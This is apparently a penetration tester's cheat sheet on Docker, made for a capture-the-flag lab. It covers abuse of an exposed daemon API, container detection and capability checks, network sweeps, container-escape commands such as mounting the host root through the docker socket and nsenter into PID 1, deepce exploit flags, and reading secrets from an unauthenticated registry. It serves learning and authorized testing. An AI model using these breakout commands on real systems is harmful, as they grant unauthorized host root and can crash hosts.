Docker

devops, docker, enum

Overview #

Detection #

Ports #

Network #

Docker API Commands #

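# Docker daemon exposed on TCP 2375 is plaintext and unauthenticated: anyone
# who can reach it can drive the daemon, which is effectively host root (see
# the `-v /:/mnt` mount in the container section). 2376 is the TLS variant
# and needs `--tlsverify` plus client certs. Confirm first with /version.
curl -s http://10.10.198.13:2375/version

# list running containers via the exposed socket (`ps -a` includes stopped ones)
docker -H tcp://10.10.198.13:2375 ps

# list images on the remote daemon (the original note said "images" but ran
# `ps`, which lists containers, not images)
docker -H tcp://10.10.198.13:2375 images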

Container Commands #

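# are we inside a container?
ls -l /.dockerenv
# cgroup v1 shows "docker" paths; on cgroup v2 hosts this may only show "/"
grep docker /proc/1/cgroup
grep -E 'docker|containerd|kubepods' /proc/self/mountinfo

# check if privileged - a privileged container sees the host block devices
fdisk -l
ls -l /dev

# check effective capabilities. CapEff (the "Current:" set in capsh) is what
# the process can actually use; the bounding set only limits what could be
# gained. If CapEff is all zeros the container has very little and most
# breakouts below will not work.
capsh --print | grep -E 'cap_(net_admin|sys_module|sys_chroot|sys_admin|sys_time)'

# Use this if `capsh` is not available
# - copy the CapEff (and CapPrm) hex value and decode it on the attacker
#   machine: capsh --decode=<HEX>
grep '^Cap' /proc/$$/status

# Extracting network information
cat /proc/net/tcp
hostname -I
ifconfig
ip a

# Check the neighbour/ARP cache for other hosts on the bridge network
# (for example the database container the application talks to).
ip neighbor
arp -a
cat /etc/hosts

# Check subnets
grep -B1 "32 host LOCAL" /proc/net/fib_trie

# Ping sweep for reachable IPs (adjust the /24 to what `ip a` showed).
# The last octet only runs 1..254: anything above 255 is not a valid address,
# so the original 1..65535 loop was mostly wasted. -W 1 caps the wait per host.
for i in {1..254}; do (ping -c 1 -W 1 "172.17.0.${i}" | grep "bytes from" | grep -v "Unreachable" &); done
for i in {1..254}; do ping -c 1 -W 1 "172.20.0.${i}" &> /dev/null && echo "${i}: UP"; done

# check if we can talk to the docker socket (if so, the `docker run -v /:/mnt`
# below gives a host root shell)
ls -l /var/run/docker.sock

# check whether the host's /proc is writable (masked/read-only in a normal
# container, writable when privileged). Test before writing: '1' only sets
# the console loglevel, but 'b'/'c'/'o' would reboot/crash/power off the HOST.
[ -w /proc/sysrq-trigger ] && echo "sysrq-trigger writable"
echo 1 > /proc/sysrq-trigger

# mount the host root filesystem through the docker socket and chroot into it
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# docker running with --pid=host? then host processes (init, sshd, dockerd)
# show up here alongside the container's own
ps -ef

# use a statically compiled nmap and upload /usr/share/nmap next to it
# inside the container (--datadir points at that copy)
./nmap --datadir usr/share/nmap -sT -p1-65535 172.20.0.1-10

# enter the mount namespace of PID 1 and drop to a host shell
# (typically needs --pid=host plus CAP_SYS_ADMIN, i.e. a privileged container)
nsenter --target 1 --mount sh

# create a new user namespace mapping us to root (needs unprivileged user
# namespaces on the host; the default Docker seccomp profile normally blocks it)
unshare -r

# see if you can migrate into every namespace of PID 1 (root namespace?)
nsenter --target 1 --all

# check hardcoded IPs and hostnames
cat /etc/hosts

# check what devices are available and mounted
mount
cat /proc/mounts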

Automated tools #

# CDK: enumerates container/k8s context and known escape vectors;
# --full runs every check. https://github.com/cdk-team/CDK#installationdelivery
cdk evaluate --full

# docker-escape-tool: `check` only reports possible escape paths, it does
# not exploit them. https://github.com/PercussiveElbow/docker-escape-tool
./docker_escape check

# deepce: https://github.com/stealthcopter/deepce
# - plain run is enumeration only
./deepce.sh
# - skip enumeration and run the PRIVILEGED exploit; --username/--password
#   set the credentials the exploit creates (here the defaults shown)
./deepce.sh --no-enumeration --exploit PRIVILEGED --username
./deepce.sh --password deepce

Docker Registries #

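# Registry v2 API on :5000 without auth: list repositories. An
# unauthenticated registry lets anyone pull (and often push) images.
curl -s http://docker-rodeo.thm:5000/v2/_catalog

# list tags for an image (was `url`, a typo for `curl`)
curl -s http://docker-rodeo.thm:5000/v2/cmnatic/myapp1/tags/list

# inspect the image manifest. Without an Accept header the registry returns
# the schema-1 manifest whose history embeds each layer's build command, so a
# plain grep can surface file paths and secrets baked in at build time.
curl -s http://docker-rodeo.thm:5000/v2/cmnatic/myapp1/manifests/latest | grep /root/root.txt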

Docker parameters #

# gives the container all capabilities, access to all host devices, and no
# seccomp/AppArmor confinement - effectively root on the host
--privileged

# disables the default seccomp syscall filter only (capabilities and
# AppArmor still apply; use `apparmor=unconfined` for the latter).
# The value is `unconfined`, not `undefined`.
--security-opt seccomp=unconfined

Tools #

References #